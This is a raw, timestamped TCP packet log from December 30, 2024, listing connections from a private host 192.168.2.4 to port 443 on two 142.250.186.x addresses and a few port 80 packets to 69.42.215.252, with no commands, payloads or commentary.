                                                                                                              Dec 30, 2024 11:37:44.652051926 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.652108908 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.652582884 CET50543443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.652683020 CET44350543142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.652770996 CET50543443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.653000116 CET50543443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.653034925 CET44350543142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.716074944 CET44350539142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.716131926 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.716164112 CET44350539142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.716208935 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.716609001 CET44350539142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.716651917 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.716665030 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.716671944 CET44350539142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.716859102 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.717803001 CET50544443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.717853069 CET44350544142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.717910051 CET50544443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.718383074 CET50544443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.718400002 CET44350544142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.744841099 CET44350540142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.744919062 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.744949102 CET44350540142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.744986057 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.744992971 CET44350540142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.745112896 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.745120049 CET44350540142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.745146990 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.745168924 CET44350540142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.745208025 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.745275021 CET44350540142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.745317936 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.745546103 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.745560884 CET44350540142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.746413946 CET50545443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.746464968 CET44350545142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.746558905 CET50545443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.746711969 CET50545443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.746725082 CET44350545142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.783869982 CET50541443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.783896923 CET50543443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.783911943 CET50544443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.784425020 CET50546443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.784466028 CET44350546142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.784625053 CET50546443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.785274982 CET50546443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.785286903 CET44350546142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.786096096 CET50547443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.786138058 CET44350547142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.786214113 CET50547443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.787234068 CET50547443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.787240028 CET44350547142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.788158894 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.788213015 CET44350548142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.788274050 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.789438009 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.789453030 CET44350548142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.221028090 CET4973980192.168.2.469.42.215.252
                                                                                                              Dec 30, 2024 11:37:45.368561029 CET44350545142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.368658066 CET50545443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.370349884 CET50545443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.370362997 CET44350545142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.371886969 CET50545443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.371893883 CET44350545142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.389719963 CET44350548142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.389795065 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.390458107 CET44350548142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.390506983 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.392421007 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.392460108 CET44350548142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.392733097 CET44350548142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.392791033 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.393201113 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.399003029 CET44350547142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.399197102 CET50547443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.400041103 CET44350547142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.400096893 CET50547443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.401899099 CET50547443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.401910067 CET44350547142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.402169943 CET44350547142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.402378082 CET50547443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.402730942 CET50547443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.407020092 CET44350546142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.407140017 CET50546443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.407469988 CET50546443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.407491922 CET44350546142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.407690048 CET50546443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.407705069 CET44350546142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.435352087 CET44350548142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.447326899 CET44350547142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.762962103 CET44350548142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.763446093 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.763478041 CET44350548142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.763602018 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.763848066 CET44350548142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.763863087 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.763902903 CET44350548142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.763925076 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.763957977 CET50548443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.764448881 CET50551443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.764494896 CET44350551142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.764723063 CET50551443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.764890909 CET50551443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.764903069 CET44350551142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.772027969 CET44350547142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.772114992 CET50547443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.772128105 CET44350547142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.772212029 CET50547443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.772443056 CET50547443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.772475004 CET44350547142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.772576094 CET50547443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.773063898 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.773103952 CET44350552142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.773202896 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.775207996 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:45.775218010 CET44350552142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.785465956 CET44350545142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.785514116 CET44350545142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.785609961 CET44350545142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.785640001 CET50545443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.785732031 CET50545443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.810350895 CET50545443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.810384035 CET44350545142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.810734987 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.810771942 CET44350553142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.811379910 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.812448978 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.812464952 CET44350553142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.928741932 CET44350546142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.928778887 CET44350546142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.928870916 CET50546443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.928881884 CET44350546142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.928894997 CET44350546142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.928911924 CET50546443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:45.929022074 CET50546443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.024481058 CET50546443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.024508953 CET44350546142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.027947903 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.027992010 CET44350554142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.028981924 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.032469034 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.032486916 CET44350554142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.375329971 CET44350552142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.375554085 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.376091003 CET44350552142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.376246929 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.379616976 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.379647017 CET44350552142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.379951954 CET44350552142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.380013943 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.380603075 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.398287058 CET44350551142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.398374081 CET50551443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.399204969 CET44350551142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.399333000 CET50551443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.404464006 CET50551443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.404484987 CET44350551142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.404921055 CET44350551142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.405114889 CET50551443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.405515909 CET50551443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.411938906 CET44350553142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.412597895 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.412894011 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.412905931 CET44350553142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.416459084 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.416476965 CET44350553142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.423348904 CET44350552142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.424240112 CET4973980192.168.2.469.42.215.252
                                                                                                              Dec 30, 2024 11:37:46.447340965 CET44350551142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.632639885 CET44350554142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.632699966 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.633321047 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.633328915 CET44350554142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.633505106 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.633510113 CET44350554142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.749291897 CET44350552142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.749358892 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.749387980 CET44350552142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.749403000 CET44350552142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.749433041 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.749450922 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.749478102 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.749495029 CET44350552142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.749506950 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.749535084 CET50552443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.750015974 CET50555443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.750072956 CET44350555142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.750134945 CET50555443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.750607967 CET50555443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.750624895 CET44350555142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.950218916 CET44350551142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.950279951 CET50551443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.950309038 CET44350551142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.950325012 CET44350551142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.950350046 CET50551443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.950378895 CET50551443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.950494051 CET44350553142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.950562000 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.950591087 CET44350553142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.950625896 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.950645924 CET44350553142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.950691938 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.950824976 CET44350553142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.950860023 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.950902939 CET44350553142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.950937986 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.951025009 CET44350553142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.951065063 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.956921101 CET50551443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.956948996 CET44350551142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.957969904 CET50556443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.958034992 CET44350556142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.958105087 CET50556443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.958643913 CET50556443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:46.958666086 CET44350556142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.960210085 CET50553443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.960239887 CET44350553142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.961473942 CET50557443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.961524010 CET44350557142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:46.961586952 CET50557443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.961909056 CET50557443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:46.961920977 CET44350557142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.059794903 CET44350554142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.059839964 CET44350554142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.059880018 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.059880018 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.059907913 CET44350554142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.059942007 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.059947014 CET44350554142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.059977055 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.059981108 CET44350554142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.060009003 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.060010910 CET44350554142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.060040951 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.060882092 CET50554443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.060897112 CET44350554142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.061877012 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.061928988 CET44350558142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.061975956 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.062273026 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.062285900 CET44350558142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.544208050 CET44350555142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.544265985 CET50555443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.544728994 CET50555443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.544740915 CET44350555142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.544888973 CET50555443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.544893980 CET44350555142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.560256958 CET44350557142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.560314894 CET50557443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.561326027 CET50557443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.561342001 CET44350557142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.563585043 CET50557443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.563607931 CET44350557142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.578790903 CET44350556142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.578866005 CET50556443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.579468966 CET50556443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.579483986 CET44350556142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.579735994 CET50556443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.579741955 CET44350556142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.672286987 CET44350558142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.672414064 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.672862053 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.672875881 CET44350558142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.673049927 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.673057079 CET44350558142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.922100067 CET44350555142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.922275066 CET50555443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.922296047 CET44350555142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.922362089 CET50555443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.922522068 CET50555443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.922566891 CET44350555142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.922739029 CET44350555142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.922796965 CET50555443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.922796965 CET50555443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.924565077 CET50559443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.924606085 CET44350559142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.925002098 CET50559443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.925131083 CET50559443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.925146103 CET44350559142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.953789949 CET44350556142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.953860044 CET44350556142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.953860044 CET50556443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.953979015 CET50556443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.954035044 CET50556443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.954054117 CET44350556142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.954785109 CET50560443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.954830885 CET44350560142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.954895973 CET50560443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.955233097 CET50560443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:47.955244064 CET44350560142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.976016045 CET44350557142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.976073027 CET44350557142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.976170063 CET44350557142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.976195097 CET50557443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.976289988 CET50557443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.976958990 CET50557443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.976979971 CET44350557142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.977904081 CET50562443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.977946043 CET44350562142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:47.979407072 CET50562443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.979407072 CET50562443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:47.979435921 CET44350562142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.132663965 CET44350558142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.132781029 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.132786989 CET44350558142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.132812023 CET44350558142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.132843018 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.132869959 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.133058071 CET44350558142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.133114100 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.133143902 CET44350558142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.133188009 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.133194923 CET44350558142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.133325100 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.133814096 CET50558443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.133833885 CET44350558142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.134526968 CET50563443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.134577036 CET44350563142.250.186.97192.168.2.4
